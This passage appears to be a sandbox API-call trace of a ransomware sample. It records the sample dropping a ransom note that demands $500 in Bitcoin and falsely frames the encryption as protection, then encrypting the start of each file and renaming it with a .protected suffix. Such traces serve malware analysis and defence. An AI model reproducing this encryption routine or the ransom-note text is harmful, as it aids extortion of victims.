SERVER-ID:\r\n") returned 1341 [0076.482] WriteFile (in: hFile=0xd4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ec94*=0x53d, lpOverlapped=0x0) returned 1 [0076.483] lstrlenA (lpString="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") returned 684 [0076.483] WriteFile (in: hFile=0xd4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ec94*=0x2ac, lpOverlapped=0x0) returned 1 [0076.483] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0076.483] WriteFile (in: hFile=0xd4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ec94*=0xb1, 
lpOverlapped=0x0) returned 1 [0076.483] CloseHandle (hObject=0xd4) returned 1 [0076.484] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0076.484] FindClose (in: hFindFile=0x47b7a8 | out: hFindFile=0x47b7a8) returned 1 [0076.484] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\RESTORE_FILES.txt") returned 109 [0076.484] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\package cache\\{cf2bea3c-26ea-32f8-aa9b-331f7e34ba97}v11.0.61030\\packages\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0076.484] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0076.484] WriteFile (in: hFile=0xb4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ef04*=0x53d, lpOverlapped=0x0) returned 1 [0076.485] lstrlenA (lpString="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") returned 684 [0076.485] WriteFile (in: hFile=0xb4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ef04*=0x2ac, lpOverlapped=0x0) returned 1 [0076.485] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0076.485] WriteFile (in: hFile=0xb4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ef04*=0xb1, 
lpOverlapped=0x0) returned 1 [0076.485] CloseHandle (hObject=0xb4) returned 1 [0076.485] FindNextFileW (in: hFindFile=0x490a28, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0076.485] FindClose (in: hFindFile=0x490a28 | out: hFindFile=0x490a28) returned 1 [0076.486] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\RESTORE_FILES.txt") returned 100 [0076.486] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\package cache\\{cf2bea3c-26ea-32f8-aa9b-331f7e34ba97}v11.0.61030\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0076.487] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0076.487] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f174*=0x53d, lpOverlapped=0x0) returned 1 [0076.488] lstrlenA (lpString="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") returned 684 [0076.488] WriteFile (in: hFile=0xa4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f174*=0x2ac, lpOverlapped=0x0) returned 1 [0076.489] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0076.489] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f174*=0xb1, 
lpOverlapped=0x0) returned 1 [0076.489] CloseHandle (hObject=0xa4) returned 1 [0076.489] FindNextFileW (in: hFindFile=0x494b80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0076.489] lstrcmpiW (lpString1="{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017", lpString2="Windows") returned -1 [0076.489] lstrcmpiW (lpString1="{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017", lpString2="Program Files") returned -1 [0076.489] lstrcmpiW (lpString1="{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017", lpString2="Program Files (x86)") returned -1 [0076.489] lstrcmpiW (lpString1="{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017", lpString2="$Recycle.bin") returned 1 [0076.489] lstrcmpiW (lpString1="{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017", lpString2="System Volume Information") returned -1 [0076.489] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017") returned 83 [0076.489] lstrcmpW (lpString1="{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017", lpString2=".") returned 1 [0076.489] lstrcmpW (lpString1="{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017", lpString2="..") returned 1 [0076.489] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\*") returned 85 [0076.489] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x490a28 [0076.489] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0076.489] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0076.489] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0076.489] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0076.489] lstrcmpiW 
(lpString1=".", lpString2="System Volume Information") returned -1 [0076.489] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\.") returned 85 [0076.489] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0076.489] FindNextFileW (in: hFindFile=0x490a28, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0076.490] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0076.490] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0076.490] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0076.490] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0076.490] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0076.490] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\..") returned 86 [0076.490] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0076.490] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0076.490] FindNextFileW (in: hFindFile=0x490a28, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0076.490] lstrcmpiW (lpString1="packages", lpString2="Windows") returned -1 [0076.490] lstrcmpiW (lpString1="packages", lpString2="Program Files") returned -1 [0076.490] lstrcmpiW (lpString1="packages", lpString2="Program Files (x86)") returned -1 [0076.490] lstrcmpiW (lpString1="packages", lpString2="$Recycle.bin") returned 1 [0076.490] lstrcmpiW (lpString1="packages", lpString2="System Volume Information") returned -1 [0076.490] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages") returned 92 [0076.490] lstrcmpW (lpString1="packages", lpString2=".") returned 1 [0076.490] 
lstrcmpW (lpString1="packages", lpString2="..") returned 1 [0076.491] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\*") returned 94 [0076.491] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x47b7a8 [0076.492] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0076.492] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0076.492] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0076.492] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0076.492] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0076.492] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\.") returned 94 [0076.492] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0076.492] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0076.492] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0076.492] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0076.492] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0076.492] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0076.492] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0076.492] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\..") returned 95 [0076.492] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0076.492] lstrcmpW (lpString1="..", lpString2="..") 
returned 0 [0076.492] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0076.493] lstrcmpiW (lpString1="vcRuntimeAdditional_amd64", lpString2="Windows") returned -1 [0076.493] lstrcmpiW (lpString1="vcRuntimeAdditional_amd64", lpString2="Program Files") returned 1 [0076.493] lstrcmpiW (lpString1="vcRuntimeAdditional_amd64", lpString2="Program Files (x86)") returned 1 [0076.493] lstrcmpiW (lpString1="vcRuntimeAdditional_amd64", lpString2="$Recycle.bin") returned 1 [0076.493] lstrcmpiW (lpString1="vcRuntimeAdditional_amd64", lpString2="System Volume Information") returned 1 [0076.493] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64") returned 118 [0076.493] lstrcmpW (lpString1="vcRuntimeAdditional_amd64", lpString2=".") returned 1 [0076.493] lstrcmpW (lpString1="vcRuntimeAdditional_amd64", lpString2="..") returned 1 [0076.493] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\*") returned 120 [0076.493] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x447c80 [0076.493] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0076.493] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0076.493] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0076.493] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0076.493] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0076.493] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | 
out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\.") returned 120 [0076.493] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0076.493] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0076.494] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0076.494] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0076.494] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0076.494] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0076.494] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0076.494] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\..") returned 121 [0076.494] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0076.494] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0076.494] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0076.494] lstrcmpiW (lpString1="cab1.cab", lpString2="Windows") returned -1 [0076.494] lstrcmpiW (lpString1="cab1.cab", lpString2="Program Files") returned -1 [0076.494] lstrcmpiW (lpString1="cab1.cab", lpString2="Program Files (x86)") returned -1 [0076.494] lstrcmpiW (lpString1="cab1.cab", lpString2="$Recycle.bin") returned 1 [0076.494] lstrcmpiW (lpString1="cab1.cab", lpString2="System Volume Information") returned -1 [0076.494] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\cab1.cab") returned 127 [0076.494] StrStrIW (lpFirst="cab1.cab", lpSrch=".protected") returned 0x0 [0076.494] lstrcmpW 
(lpString1="cab1.cab", lpString2="RESTORE_FILES.txt") returned -1 [0076.494] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0076.494] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0076.494] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{e512788e-c50b-3858-a4b9-73ad5f3f9e93}v14.10.25017\\packages\\vcruntimeadditional_amd64\\cab1.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0076.576] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\cab1.cab") returned 127 [0076.576] StrStrW (lpFirst="cab1.cab", lpSrch=".txt") returned 0x0 [0076.576] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\cab1.cab") returned 127 [0076.576] StrStrW (lpFirst="cab1.cab", lpSrch=".rar") returned 0x0 [0076.576] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\cab1.cab") returned 127 [0076.576] StrStrW (lpFirst="cab1.cab", lpSrch=".zip") returned 0x0 [0076.576] ReadFile (in: hFile=0xd8, lpBuffer=0x49e450, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49e450*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0076.584] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) 
returned 1 [0076.584] WriteFile (in: hFile=0xd8, lpBuffer=0x49e450*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49e450*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0076.584] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.584] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0076.600] WriteFile (in: hFile=0xd8, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0076.600] CloseHandle (hObject=0xd8) returned 1 [0076.610] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\cab1.cab.protected") returned 137 [0076.611] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{e512788e-c50b-3858-a4b9-73ad5f3f9e93}v14.10.25017\\packages\\vcruntimeadditional_amd64\\cab1.cab"), lpNewFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\cab1.cab.protected" (normalized: "c:\\programdata\\package cache\\{e512788e-c50b-3858-a4b9-73ad5f3f9e93}v14.10.25017\\packages\\vcruntimeadditional_amd64\\cab1.cab.protected")) returned 1 [0076.611] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0076.611] lstrcmpiW 
(lpString1="vc_runtimeAdditional_x64.msi", lpString2="Windows") returned -1 [0076.611] lstrcmpiW (lpString1="vc_runtimeAdditional_x64.msi", lpString2="Program Files") returned 1 [0076.611] lstrcmpiW (lpString1="vc_runtimeAdditional_x64.msi", lpString2="Program Files (x86)") returned 1 [0076.611] lstrcmpiW (lpString1="vc_runtimeAdditional_x64.msi", lpString2="$Recycle.bin") returned 1 [0076.611] lstrcmpiW (lpString1="vc_runtimeAdditional_x64.msi", lpString2="System Volume Information") returned 1 [0076.611] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi") returned 147 [0076.611] StrStrIW (lpFirst="vc_runtimeAdditional_x64.msi", lpSrch=".protected") returned 0x0 [0076.611] lstrcmpW (lpString1="vc_runtimeAdditional_x64.msi", lpString2="RESTORE_FILES.txt") returned 1 [0076.612] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0076.612] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0076.612] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi" (normalized: "c:\\programdata\\package cache\\{e512788e-c50b-3858-a4b9-73ad5f3f9e93}v14.10.25017\\packages\\vcruntimeadditional_amd64\\vc_runtimeadditional_x64.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0076.612] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi") returned 
147 [0076.612] StrStrW (lpFirst="vc_runtimeAdditional_x64.msi", lpSrch=".txt") returned 0x0 [0076.613] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi") returned 147 [0076.613] StrStrW (lpFirst="vc_runtimeAdditional_x64.msi", lpSrch=".rar") returned 0x0 [0076.613] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi") returned 147 [0076.613] StrStrW (lpFirst="vc_runtimeAdditional_x64.msi", lpSrch=".zip") returned 0x0 [0076.613] ReadFile (in: hFile=0xd8, lpBuffer=0x49e450, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49e450*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0076.614] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.614] WriteFile (in: hFile=0xd8, lpBuffer=0x49e450*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49e450*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0076.615] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.615] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0076.615] WriteFile (in: hFile=0xd8, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0076.615] CloseHandle (hObject=0xd8) returned 1 [0076.666] wnsprintfW (in: 
